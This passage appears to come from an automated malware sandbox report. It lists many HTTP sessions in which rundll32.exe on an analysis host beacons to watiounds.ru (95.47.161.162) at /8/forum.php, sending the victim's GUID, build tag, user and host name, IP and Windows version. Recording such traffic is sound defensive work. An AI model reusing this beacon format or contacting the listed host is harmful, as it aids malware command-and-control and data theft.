                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:35.199522972 CEST209INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZFUAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          156192.168.2.224932195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:35.526973963 CEST210OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:35.651738882 CEST210INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGZATARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          157192.168.2.224932295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:35.979156971 CEST211OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:36.102766991 CEST211INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4e 4d 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFNMUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          158192.168.2.224932395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:36.422058105 CEST212OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:36.545897961 CEST212INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHZASARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          159192.168.2.224932495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:36.872833967 CEST213OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:37.003320932 CEST213INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 43 58 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVCXEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          16192.168.2.224918195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:20:17.727369070 CEST45OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:20:17.850480080 CEST45INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:20:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 51 4a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVQJEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          160192.168.2.224932595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:37.359987020 CEST214OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:37.488110065 CEST214INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGMNTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          161192.168.2.224932695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:37.805228949 CEST215OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:37.938340902 CEST216INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZAZAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          162192.168.2.224932795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:38.258582115 CEST216OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:38.389040947 CEST217INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 59 42 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMYBNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          163192.168.2.224932895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:38.702413082 CEST217OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:38.824894905 CEST218INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBZAYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          164192.168.2.224932995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:39.143122911 CEST219OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:39.265633106 CEST219INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAVEZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          165192.168.2.224933095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:39.578965902 CEST220OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:39.701931953 CEST220INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 47 54 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNGTMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          166192.168.2.224933195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:40.031402111 CEST221OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:40.153162956 CEST221INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNKPMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          167192.168.2.224933295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:40.474637032 CEST222OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:40.602092981 CEST222INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 51 4a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBQJYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          168192.168.2.224933395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:40.933681965 CEST223OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:41.074187994 CEST223INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          169192.168.2.224933495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:41.391406059 CEST224OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:41.515707016 CEST224INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQYBJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          17192.168.2.224918295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:20:32.946449995 CEST48OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:20:33.073031902 CEST48INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:20:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          170192.168.2.224933595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:41.844995975 CEST225OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:41.970844030 CEST226INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 46 55 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNFUMARRABw==0


